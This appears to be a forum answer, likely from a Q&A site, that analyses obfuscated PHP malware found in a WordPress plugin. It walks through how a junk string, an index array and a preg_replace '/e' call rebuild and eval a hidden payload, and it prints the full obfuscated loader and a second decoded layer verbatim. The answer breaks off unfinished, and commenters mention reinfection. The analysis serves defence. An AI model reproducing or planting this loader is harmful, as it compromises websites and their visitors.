:!ftmf!}Z;^nbsbq%x782f%x5c%x7825z<jg!)%<%x5c%x787fw6<*K)ftpmdXA825j>1<%x5c%x7825j=tj{fpg)%x5c%x7825%x5c%x7824-%x5c%x7824*<7825!|!*!***b%x5c%x7825)sf%x5c55Ld]55#*<%x5c%x7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*33]65]y31]55]y85]82]y76]62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", 6~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utjm6<%x=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5)tpqsut>j%x5c%x7825!*9!%x588:}334}472%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y76]x5c%x7825:osvufs:~9284y]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>s%x25:-t%x5c%x7825)3of:opjudovg<~%x5c%x%x785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c%y3f]51L3]84]y31M6]y3e]81#%x5c%x782f#7e:5c%x782f#o]#%x5c%x782f*)323zbe!63]y3:]68]y76#<%x5c%x78825zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#Qw2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%0%x6c%157%x64%145%x28%141%x72%162%x61%171%x5f%155%x61%160%x28%4-%x5c%x7824-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x78246]271]y7d]252]y74]256]y39]252]y83]273]y72]2!%x5c%x7825tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825w)%x5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785c1^Wx5c%x7825r%x5c%x7878Bsfuvso!sboepn)%c%x7825>2q%x5c%x7825<#g6R85,67R37,18R#>q%82f7^#iubq#%x5c%x785cq%x5c%x78252#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)37860hA%x5c%x7827pd%x5+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%x5c%xof>2bd%x5c%x7825!<5h%x5c%x7825%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x7utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%x5cnfd)##Qtpz)#]341]88M4P8]37]278]225]241]334]368]322]3]364]6]283]425c%x7825Z<#opo#>b%x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x7825>j%x5c%x7825!<**3-j%x5c%x7825-bu%x5c%x782f#0#%x5c%x782f*#npd%x5c%x782f#)rrd%x525z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825w%x5c%x7860TW~%x5c%x785cq%x5c%x7825%x5c%xx5c%x7825ggg!>!#]y81]273]y76]258]y6g%x7878pmpusut!-#j0#!%x5c%x782f!**#s5-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x78<*#k#)usbut%x5c%x7860cpV%x5c%x787f%x5c%x787f%x5c%x787f78256<*Y%x5c%x7825)fnbozcYufhA%x5c%x78272qj%x5c%x7825!>!tus%x5c%x7860sfqmbdf)%x5c%x7825%x5c%x7824-%x5c%x7824y4%25j:=tj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825($n)-1);} @error_reporting(0); preg_rep825)utjm!|!*5!%x5c%x7827!hmg%x5c%x7825)!gj!|!*7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860ope%x5c%x78b%x5c%x7825w:!bE{h%x5c%x7825)sutcvt-#w#)ldbqov>*ofmy%x5c%x7x7825%x5c%x7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P#-#Q&6|7**111127-K)ebfsX%x5c%x785c%x7825<#462]47y]252]18x5c%x7827;%x5c%x7825!<*#}_;#)323ldfid>}&;!osvufs}%x5822l:!}V;3q%x5c%x7825}U;y]}R;h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutif((function_exists("%x6f%142%x5f%163%x74%141%x72%164"5!**X)ufttj%x5c%x7822)gj!|!*nbsbq%x5c%x782%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7825)}.;%%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x7]D4]82]K6]72]K9]78]K5]53]Kc#<%x5c%x7825tpz!>!#]D6M7]KXAZASV<*w%x5c%x7825)ppde>u%x5c%xy35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y4c#<!%x5c%x75%156%x61"]=1; function fjfgg($n){return chr(ord7825s:%x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860%x5c%x5c%x7827jsv%x5c%x78256<C>^#zsfvr#%x5c%x785cq%x5c5c%x7825%x5c%x785cSFWSFT%x5c%x7860%x5c%x7825}X;!sp!*#opo#>>}R;msv}7825t::!>!%x5c%x7824Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!tussf%x7824y7%x5c%x7824-%x5c%x7824*<!%x5c%x7824c%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x7-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!c%x782f#00;quui#>.%x5c%x7825!<***f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7f%163%x70%154%x69%164%50%x22%134%x78%62%x35%16<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x782f7#@#7%x5c%x7.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c%xjudovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!j:>>1*!%x5c%x7825b:>1<!fmtf!%x5c%x7825b:>%x5c%x7825s:%$GLOBALS["%x61%156%x>>%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)t1Ld]245]K2]285]Ke]53Ld]53]Kc]+opjudovg+)!gj+{e%x5c%x%x78257**^#zsfvr#%x5c827,*c%x5c%x7827,*b%x5c%x7827)fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)%x7878{**#k#)tutjyf%x5c%x%x5c%x787fw6*3qj%x5c%x78257>%x5c%x782272qj%x5c%x7825)7gj6<**2qj34]68]y33]65]y31]53]y6d]281]y43]78]y%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!gjy72]254]y76#<%x5c%x7825tmw!>!#]y84]275]y83]273]y76]277#<%x5c%x7825t2w>x5c%x7860UQPMSVD!-id%x5-#N#*%x5c%x7824%x5c%x782f%xEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5cx7824-!%x5c%x7825%x5c%x7824-%x5c%x7824*!|!%x5c%x78SFTV%x5c%x7860QUUI&b%x5c*72!%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x782p>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-bubEc%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7825,3,j%x5c%x7825c%x782fq%x5c%x7825>U<#16,47R57ce44#)zbssb!>!ssbnpe_GMFT%x5/(.*)/epreg_replaceligcmavovh';
$aedsarxrxu = explode(chr((279 - 235)), '8157,54,4068,52,9207,20,8493,49,7703,39,621,22,35,43,6385,63,3497,43,8965,45,5319,60,6260,23,7845,23,2900,46,4368,33,643,33,2221,22,997,24,6814,21,821,42,5144,54,5824,65,1327,58,7971,28,5113,31,3940,48,5262,57,4308,60,5580,24,4938,68,4248,25,1605,37,9438,63,8304,47,7537,53,9010,54,6723,32,8598,50,9316,21,6143,47,7333,22,1988,52,3236,26,9367,46,1227,46,2192,29,6958,39,1739,64,8814,42,2477,50,929,21,4637,65,1273,54,4019,49,0,35,6997,66,8253,51,9706,23,5075,38,3766,61,1186,41,7788,57,9113,40,1128,30,7426,57,5198,64,8856,42,9863,69,5952,27,9992,55,7184,33,7868,45,7742,46,3713,53,9932,60,5006,69,1963,25,3637,28,4464,58,209,35,2401,44,6755,59,6895,30,7217,46,8898,67,9337,30,4702,59,1893,36,3338,33,5663,30,7391,35,4897,41,6835,60,950,47,771,27,2572,66,10078,28,1570,35,9756,33,2373,28,9839,24,5452,50,7128,56,8211,42,4120,62,5502,57,8648,66,9064,49,798,23,8023,52,3371,25,6031,21,9227,37,1682,57,8104,53,4827,70,9293,23,9581,55,7483,54,2311,34,244,40,8405,32,676,31,10047,31,2812,22,6682,41,4401,63,9413,25,480,21,8075,29,3827,68,3988,31,4273,35,5889,63,6229,31,3895,45,4522,51,6504,43,2102,55,9636,70,905,24,523,39,6547,55,1839,54,2550,22,78,67,4182,66,284,62,6052,55,7999,24,2638,67,6107,36,1642,40,5979,52,5431,21,3262,68,9789,50,3188,48,1385,30,1021,48,6448,56,7590,58,2770,42,3009,60,1158,28,8772,42,501,22,5604,59,2040,62,2705,65,8437,56,8714,58,6602,44,9537,44,346,43,6646,36,431,49,2157,35,6283,66,2243,68,1515,55,2345,28,2834,66,3596,41,3069,61,6190,39,2445,32,8351,54,863,42,4761,66,2946,63,9264,29,5693,65,5379,52,4573,64,7063,65,562,59,145,64,389,42,1069,59,1457,58,3540,56,7648,55,9153,54,3130,58,8542,56,6925,33,6349,36,1803,36,5559,21,2527,23,7263,70,1415,42,7913,58,3396,61,9729,27,3457,40,7355,36,707,64,1929,34,3665,48,9501,36,5758,66,3330,8');
$qabxkhdqko = substr($hqjfikzgcz, (38694 - 28588), (41 - 34));

if (!function_exists('jfgitccmer')) {
    function jfgitccmer($lirydcgfik, $ovmrwembqq)
    {
        $tozjzswwnv = NULL;
        for ($qpotywmsnh = 0; $qpotywmsnh < (sizeof($lirydcgfik) / 2); $qpotywmsnh++) {
            $tozjzswwnv .= substr($ovmrwembqq, $lirydcgfik[($qpotywmsnh * 2)], $lirydcgfik[($qpotywmsnh * 2) + 1]);
        }

        return $tozjzswwnv;
    }

    ;
}

$vjdxsgvpaf = "\x20\57\x2a\40\x6c\144\x6d\164\x66\156\x78\165\x68\154\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\66\x36\55\x31\62\x39\51\x29\54\x20\143\x68\162\x28\50\x35\62\x33\55\x34\63\x31\51\x29\54\x20\152\x66\147\x69\164\x63\143\x6d\145\x72\50\x24\141\x65\144\x73\141\x72\170\x72\170\x75\54\x24\150\x71\152\x66\151\x6b\172\x67\143\x7a\51\x29\51\x3b\40\x2f\52\x20\150\x71\165\x6f\170\x69\146\x67\151\x74\40\x2a\57\x20";
$qafogaxdeu = substr($hqjfikzgcz, (36023 - 25910), (50 - 38));

$qafogaxdeu($qabxkhdqko, $vjdxsgvpaf, NULL);
$qafogaxdeu = $vjdxsgvpaf;
$qafogaxdeu = (800 - 679);
$hqjfikzgcz = $qafogaxdeu - 1;
```

Most of this script is just initializing values, and hiding  stuff, the execution happens at:

```
$qafogaxdeu($qabxkhdqko, $vjdxsgvpaf, NULL);
```

You can see that `$qafogaxdeu` is a variable that was created from:

```
$qafogaxdeu = substr($hqjfikzgcz, (36023 - 25910), (50 - 38));
```

So `$hqjfikzgcz`  on the first line is just a container with a butt-load of junk for a 12 character string: `preg_replace`.

You are essentially executing

```
preg_replace($qabxkhdqko, $vjdxsgvpaf, NULL);
```

If you evaluate the other variables you will obtain:

```
preg_replace("/(.*)/e", " /* ldmtfnxuhl */ eval(str_replace(chr((166-129)), chr((523-431)), jfgitccmer($aedsarxrxu,$hqjfikzgcz))); /* hquoxifgit */ ");
```

Which translates to:

```
insert the following code into page:
/* ldmtfnxuhl */ eval(str_replace(chr((166-129)), chr((523-431)), jfgitccmer($aedsarxrxu,$hqjfikzgcz))); /* hquoxifgit */
```

Now, what does that do? It `evals` a `str_replace` result. The first parameter is `%` and the second is `\`, the 3rd is a result from the function you see declared above:

```
function jfgitccmer($lirydcgfik, $ovmrwembqq)
{
    $tozjzswwnv = NULL;
    for ($qpotywmsnh = 0; $qpotywmsnh < (sizeof($lirydcgfik) / 2); $qpotywmsnh++) {
        $tozjzswwnv .= substr($ovmrwembqq, $lirydcgfik[($qpotywmsnh * 2)], $lirydcgfik[($qpotywmsnh * 2) + 1]);
    }

    return $tozjzswwnv;
}
```

The parameters given are:

- an array of numbers you can see exploded (by a `,`) from line 2
- The huge string from line 1

The function then loops over and assembles yet another string, which if you remember from above will be executed by the `eval`

```
if ((function_exists("\x6f\142\x5f\163\x74\141\x72\164") && (!isset($GLOBALS["\x61\156\x75\156\x61"])))) {
$GLOBALS["\x61\156\x75\156\x61"] = 1;
function fjfgg($n)
{
    return chr(ord($n) - 1);
}

@error_reporting(0);
preg_replace("\x2f\50\x2e\52\x29\57\x65", "\x65\166\x61\154\x28\151\x6d\160\x6c\157\x64\145\x28\141\x72\162\x61\171\x5f\155\x61\160\x28\42\x66\152\x66\147\x67\42\x2c\163\x74\162\x5f\163\x70\154\x69\164\50\x22\134\x78\62\x35\165\x3a\146\x21\76\x21\50\x5c\x7825\x5c\x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<\x5c\x78e\x5c\x78b\x5c\x7825w:!>!\x5c\x78246767~6<Cw6<pd\x5c\x7825w6Z6<.5\x5c\x7860hA\x5c\x7827pd\x5c\x78256<pd\x5c\x7825w6Z6<.4\x5c\x7860hA\x5c\x7827pd\x5c\x78256<pd\x5c\x7825w6Z6<.3\x5c\x7860hA\x5c\x7827pd\x5c\x78256<pd\x5c\x7825w6Z6<.2\x5c\x7860hA\x5c\x7827pd\x5c\x78256<C\x5c\x7827pd\x5c\x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf\x5c\x7827*&7-n\x5c\x7825)utjm6<\x5c\x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u\x5c\x78257>\x5c\x782f7&6|7**111127-K)ebfsX\x5c\x7827u\x5c\x7825)7fmji\x5c\x78786<C\x5c\x7827&6<*rfs\x5c\x78257-K)fujs\x5c\x7878X6<#o]o]Y\x5c\x78257;utpI#7>\x5c\x782f7rfs\x5c\x78256<#o]1\x5c\x782f20QUUI7jsv\x5c\x78257UFH#\x5c\x7827rfs\x5c\x78256~6<\x5c\x787fw6<*K)ftpmdXA6|7**197-2qj\x5c\x78257-K)udfoopdXA\x5c\x7822)7gj6<*QDU\x5c\x7860MPT7-NBFSUT\x5c\x7860LDPT7-UFOJ\x5c\x7860GB)fubfsdXA\x5c\x7827K6<\x5c\x787fw6*3qj\x5c\x78257>\x5c\x782272qj\x5c\x7825)7gj6<**2qj\x5c\x7825)hopm3qjA)qj3hopmA\x5c\x78273qj\x5c\x78256<*Y\x5c\x7825)fnbozcYufhA\x5c\x78272qj\x5c\x78256<^#zsfvr#\x5c\x785cq\x5c\x78257\x5c\x782f7#@#7\x5c\x782f7^#iubq#\x5c\x785cq\x5c\x7825\x5c\x7827jsv\x5c\x78256<C>^#zsfvr#\x5c\x785cq\x5c\x78257**^#zsfvr#\x5c\x785cq\x5c\x7825)ufttj\x5c\x7822)gj6<^#Y#\x5c\x785cq\x5c\x7825\x5c\x7827Y\x5c\x78256<.msv\x5c\x7860ftsbqA7>q\x5c\x78256<\x5c\x787fw6*\x5c\x787f_*#fubfsdXk5\x5c\x7860{66~6<&w6<\x5c\x787fw6*CW&)7gj6<*doj\x5c\x78257-C)fepmqnjA\x5c\x7827&6<.fmjgA\x5c\x7827doj\x5c\x78256<\x5c\x787fw6*\x5c\x787f_*#fmjgk4\x5c\x7860{6~6<tfs\x5c\x7825w6<\x5c\x787fw6*CWtfs\x5c\x7825)7gj6<*id\x5c\x7825)ftpmdR6<*id\x5c\x7825)dfyfR\x5c\x7827tfs\x5c\x78256<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv\x5c\x78257-MSV,6<*)ujojR\x5c\x7827id\x5c\x78256<\x5c\x787fw6*\x5c\x787f_*#ujojRk3\x5c\x7860{666~6<&w6<\x5c\x787fw6*CW&)7gj6<.[A\x5c\x7827&6<\x5c\x787fw6*\x5c\x787f_*#[k2\x5c\x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd\x5c\x7860ufh\x5c\x7860fmjg}[;ldpt\x5c\x7825}K;\x5c\x7860ufldpt}X;\x5c\x7860msvd}R;*msv\x5c\x7825)}.;\x5c\x7860UQPMSVD!-id\x5c\x7825)uqpuft\x5c\x7860msvd},;uqpuft\x5c\x7860msvd}+;!>!}\x5c\x7827;!>>>!}_;gvc\x5c\x7825}&;ftmbg}\x5c\x787f;!osvufs}w;*\x5c\x787f!>>\x5c\x7822!pd\x5c\x7825)!gj}Z;h!opjudovg}{;#)tutjyf\x5c\x7860opjudovg)!gj!|!*msv\x5c\x7825)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j\x5c\x7825-bubE{h\x5c\x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j\x5c\x7825>j\x5c\x7825!*3!\x5c\x7827!hmg\x5c\x7825!)!gj!<2,*j\x5c\x7825!-#1]#-bubE{h\x5c\x7825)tpqsut>j\x5c\x7825!*72!\x5c\x7827!hmg\x5c\x7825)!gj!<2,*j\x5c\x7825-#1]#-bubE{h\x5c\x7825)tpqsut>j\x5c\x7825!*9!\x5c\x7827!hmg\x5c\x7825)!gj!~<ofmy\x5c\x7825,3,j\x5c\x7825>j\x5c\x7825!<**3-j\x5c\x7825-bubE{h\x5c\x7825)sutcvt-#w#)ldbqov>*ofmy\x5c\x7825)utjm!|!*5!\x5c\x7827!hmg\x5c\x7825)!gj!|!*1?hmg\x5c\x7825)!gj!<**2-4-bubE{h\x5c\x7825)sutcvt)esp>hmg\x5c\x7825!<12>j\x5c\x7825!|!*#91y]c9y]g2y]#>>*4-1-bubE{h\x5c\x7825)sutcvt)!gj!|!*bubE{h\x5c\x7825)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf\x5c\x7860opjudovg\x5c\x7822)!gj}1~!<2p\x5c\x7825\x5c\x787f!~!<##!>!2p\x5c\x7825Z<^2\x5c\x785c2b\x5c\x7825!>!2p\x5c\x7825!*3>?*2b\x5c\x7825)gpf{jt)!gj!<*2bd\x5c\x7825-#1GO\x5c\x7822#)fepmqyfA>2b\x5c\x7825!<*qp\x5c\x7825-*.\x5c\x7825)euhA)3of>2bd\x5c\x7825!<5h\x5c\x7825\x5c\x782f#0#\x5c\x782f*#npd\x5c\x782f#)rrd\x5c\x782f#00;quui#>.\x5c\x7825!<***f\x5c\x7827,*e\x5c\x7827,*d\x5c\x7827,*c\x5c\x7827,*b\x5c\x7827)fepdof.)fepdof.\x5c\x782f#@#\x5c\x782fqp\x5c\x7825>5h\x5c\x7825!<*::::::-111112)eobs\x5c\x7860un>qp\x5c\x7825!|Z~!<##!>!2p\x5c\x7825!|!*!***b\x5c\x7825)sf\x5c\x7878pmpusut!-#j0#!\x5c\x782f!**#sfmcnbs+yfeobz+sfwjidsb\x5c\x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!\x5c\x782f!#0#)idubn\x5c\x7860hfsq)!sp!*#ojneb#-*f\x5c\x7825)sf\x5c\x7878pmpusut)tpqssutRe\x5c\x7825)Rd\x5c\x7825)Rb\x5c\x7825))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT\x5c\x7860QIQ&f_UTPI\x5c\x7860QUUI&e_SEEB\x5c\x7860FUPNFS&d_SFSFGFS\x5c\x7860QUUI&c_UOFHB\x5c\x7860SFTV\x5c\x7860QUUI&b\x5c\x7825!|!*)323zbek!~!<b\x5c\x7825\x5c\x787f!<X>b\x5c\x7825Z<#opo#>b\x5c\x7825!*##>>X)!gjZ<#opo#>b\x5c\x7825!**X)ufttj\x5c\x7822)gj!|!*nbsbq\x5c\x7825)323ldfidk!~!<**qp\x5c\x7825!-uyfu\x5c\x7825)3of)fepdof\x5c\x786057ftbc\x5c\x787f!|!*uyfu\x5c\x7827k:!ftmf!}Z;^nbsbq\x5c\x7825\x5c\x785cSFWSFT\x5c\x7860\x5c\x7825}X;!sp!*#opo#>>}R;msv}.;\x5c\x782f#\x5c\x782f#\x5c\x782f},;#-#}+;\x5c\x7825-qp\x5c\x7825)54l}\x5c\x7827;\x5c\x7825!<*#}_;#)323ldfid>}&;!osvufs}\x5c\x787f;!opjudovg}k~~9{d\x5c\x7825:osvufs:~928>>\x5c\x7822:ftmbg39*56A:>:8:|:7#6#)tutjyf\x5c\x7860439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm\x5c\x7825:-5ppde:4:|:**#ppde#)tutjyf\x5c\x78604\x5c\x78223}!+!<+{e\x5c\x7825+*!*+fepdfe{h+{d\x5c\x7825)+opjudovg+)!gj+{e\x5c\x7825!osvufs!*!+A!>!{e\x5c\x7825)!>>\x5c\x7822!ftmbg)!gj<*#k#)usbut\x5c\x7860cpV\x5c\x787f\x5c\x787f\x5c\x787f\x5c\x787f<u\x5c\x7825V\x5c\x7827{ftmfV\x5c\x787f<*X&Z&S{ftmfV\x5c\x787f<*XAZASV<*w\x5c\x7825)ppde>u\x5c\x7825V<#65,47R25,d7R17,67R37,#\x5c\x782fq\x5c\x7825>U<#16,47R57,27R66,#\x5c\x782fq\x5c\x7825>2q\x5c\x7825<#g6R85,67R37,18R#>q\x5c\x7825V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w\x5c\x7825)kV\x5c\x7878{**#k#)tutjyf\x5c\x7860\x5c\x7878\x5c\x7822l:!}V;3q\x5c\x7825}U;y]}R;2]},;osvufs}\x5c\x7827;mnui}&;zepc}A;~!}\x5c\x787f;!|!}{;)gj}l;33bq}k;opjudovg}\x5c\x7878;0]=])0#)U!\x5c\x7827{**u\x5c\x7825-#jt0}Z;0]=]0#)2q\x5c\x7825l}S;2-u\x5c\x7825!-#2#\x5c\x782f#\x5c\x7825#\x5c\x782f#o]#\x5c\x782f*)323zbe!-#jt0*?]+^?]_\x5c\x785c}X\x5c\x7824<!\x5c\x7825tzw>!#]y76]277]y72]265]y39]274]y85]273]y6g]273]y76]271]y7d]252]y74]256]y39]252]y83]273]y72]282#<!\x5c\x7825tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<\x5c\x7825tmw!>!#]y84]275]y83]273]y76]277#<\x5c\x7825t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!\x5c\x7825tww!>!\x5c\x782400~:<h\x5c\x7825_t\x5c\x7825:osvufs:~:<*9-1-r\x5c\x7825)s\x5c\x7825>\x5c\x782fh\x5c\x7825:<**#57]38y]47]67y]37]88y]27]28y]#\x5c\x782fr\x5c\x7825\x5c\x782fh\x5c\x7825)n\x5c\x7825-#+I#)q\x5c\x7825:>:r\x5c\x7825:|:**t\x5c\x7825)m\x5c\x7825=*h\x5c\x7825)m\x5c\x7825):fmji\x5c\x7878:<##:>:h\x5c\x7825:<#64y]552]e7y]#>n\x5c\x7825<#372]58y]472]37y]672]48y]#>s\x5c\x7825<#462]47y]252]18y]#>q\x5c\x7825<#762]67y]562]38y]572]48y]#>m\x5c\x7825:|:*r\x5c\x7825:-t\x5c\x7825)3of:opjudovg<~\x5c\x7824<!\x5c\x7825o:!>!\x5c\x78242178}527}88:}334}472\x5c\x7824<!\x5c\x7825mm!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!\x5c\x7825ff2!>!bssbz)\x5c\x7824]25\x5c\x7824-\x5c\x7824-!\x5c\x7825\x5c\x7824-\x5c\x7824*!|!\x5c\x7824-\x5c\x7824\x5c\x785c\x5c\x7825j^\x5c\x7824-\x5c\x7824tvctus)\x5c\x7825\x5c\x7824-\x5c\x7824b!>!\x5c\x7825yy)#}#-#\x5c\x7824-\x5c\x7824-tusqpt)\x5c\x7825z-#:#*\x5c\x7824-\x5c\x7824!>!tus\x5c\x7860sfqmbdf)\x5c\x7825\x5c\x7824-\x5c\x7824y4\x5c\x7824-\x5c\x7824]y8\x5c\x7824-\x5c\x7824]26\x5c\x7824-\x5c\x7824<\x5c\x7825j,,*!|\x5c\x7824-\x5c\x7824gvodujpo!\x5c\x7824-\x5c\x7824y7\x5c\x7824-\x5c\x7824*<!\x5c\x7824-\x5c\x7824gps)\x5c\x7825j>1<\x5c\x7825j=tj{fpg)\x5c\x7825\x5c\x7824-\x5c\x7824*<!~!dsfbuf\x5c\x7860gvodujpo)##-!#~<#\x5c\x782f\x5c\x7825\x5c\x7824-\x5c\x7824!>!fyqmpef)#\x5c\x7824*<!\x5c\x7825kj:!>!#]y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y4c#<!\x5c\x7825t::!>!\x5c\x7824Ypp3)\x5c\x7825cB\x5c\x7825iN}#-!tussfw)\x5c\x7825c*W\x5c\x7825eN+#Qi\x5c\x785c1^W\x5c\x7825c!>!\x5c\x7825i\x5c\x785c2^<!Ce*[!\x5c\x7825cIjQeTQcOc\x5c\x782f#00#W~!Ydrr)\x5c\x7825r\x5c\x7878Bsfuvso!sboepn)\x5c\x7825epnbss-\x5c\x7825r\x5c\x7878W~!Ypp2)\x5c\x7825zB\x5c\x7825z>!tussfw)\x5c\x7825zW\x5c\x7825h>EzH,2W\x5c\x7825wN;#-Ez-1H*WCw*[!\x5c\x7825rN}#QwTW\x5c\x7825hIr\x5c\x785c1^-\x5c\x7825r\x5c\x785c2^-\x5c\x7825hOh\x5c\x782f#00#W~!\x5c\x7825t2w)##Qtjw)#]82#-#!#-\x5c\x7825tmw)\x5c\x7825tww**WYsboepn)\x5c\x7825bss-\x5c\x7825r\x5c\x7878B\x5c\x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-\x5c\x7878r.985:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#\x5c\x782f#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<\x5c\x7825tpz!>!#]D6M7]K3#<\x5c\x7825yy>#]D6]281L1#\x5c\x782f#M5]DgP5]D6#<\x5c\x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<\x5c\x7825tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<\x5c\x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<\x5c\x7825bG9}:}.}-}!#*<\x5c\x7825nfd>\x5c\x7825fdy<Cb*[\x5c\x7825h!>!\x5c\x7825tdz)\x5c\x7825bbT-\x5c\x7825bT-\x5c\x7825hW~\x5c\x7825fdy)##-!#~<\x5c\x7825h00#*<\x5c\x7825nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]234]342]58]24]31#-\x5c\x7825tdz*Wsfuvso!\x5c\x7825bss\x5c\x785csboe))1\x5c\x782f35.)1\x5c\x782f14+9**-)1\x5c\x782f2986+7**^\x5c\x782f\x5c\x7825r\x5c\x7878<~!!\x5c\x7825s:N}#-\x5c\x7825o:W\x5c\x7825c:>1<\x5c\x7825b:>1<!gps)\x5c\x7825j:>1<\x5c\x7825j:=tj{fpg)\x5c\x7825s:*<\x5c\x7825j:,,Bjg!)\x5c\x7825j:>>1*!\x5c\x7825b:>1<!fmtf!\x5c\x7825b:>\x5c\x7825s:\x5c\x785c\x5c\x7825j:.2^,\x5c\x7825b:<!\x5c\x7825c:>\x5c\x7825s:\x5c\x785c\x5c\x7825j:^<!\x5c\x7825w\x5c\x7860\x5c\x785c^>Ew:Qb:Qc:W~!\x5c\x7825z!>2<!gps)\x5c\x7825j>1<\x5c\x7825j=6[\x5c\x7825ww2!>#p#\x5c\x782f#p#\x5c\x782f\x5c\x7825z<jg!)\x5c\x7825z>>2*!\x5c\x7825z>3<!fmtf!\x5c\x7825z>2<!\x5c\x7825ww2)\x5c\x7825w\x5c\x7860TW~\x5c\x7824<\x5c\x78e\x5c\x78b\x5c\x7825mm)\x5c\x7825\x5c\x7878:-!\x5c\x7825tzw\x5c\x782f\x5c\x7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*\x5c\x7824\x5c\x782f\x5c\x7825kj:-!OVMM*<(<\x5c\x78e\x5c\x78b\x5c\x7825ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!\x5c\x7825ggg)(0)\x5c\x782f+*0f(-!#]y76]277]y72]265]y39]271]y83]256]y78]248]y83]256]y81]265]y72]254]y76]61]y33]68]y34]68]y33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]82]y76]62]y3:]84#-!OVMM*<\x22\51\x29\51\x29\73", NULL);
```

}

Which:

- Checks if the function `ob_start` is defined
- sets `$_GET['anuna'] = 1`
- defines a function `fjfgg`
- injects even more code...

wow... this is taking longer than expected, I'll complete it after work...

Comment: It happened again... still no idea what it is... trying to remove it second time. I really want the plugin though so I hoped for the best last time.

Comment: Hay, this is exactly my problem: http://blog.sucuri.net/2014/07/malware-infection-breaking-wordpress-sites.html

Comment: @user3352581 I don't suggest you use that plugin... what plugin is this?

Answer (score 0):

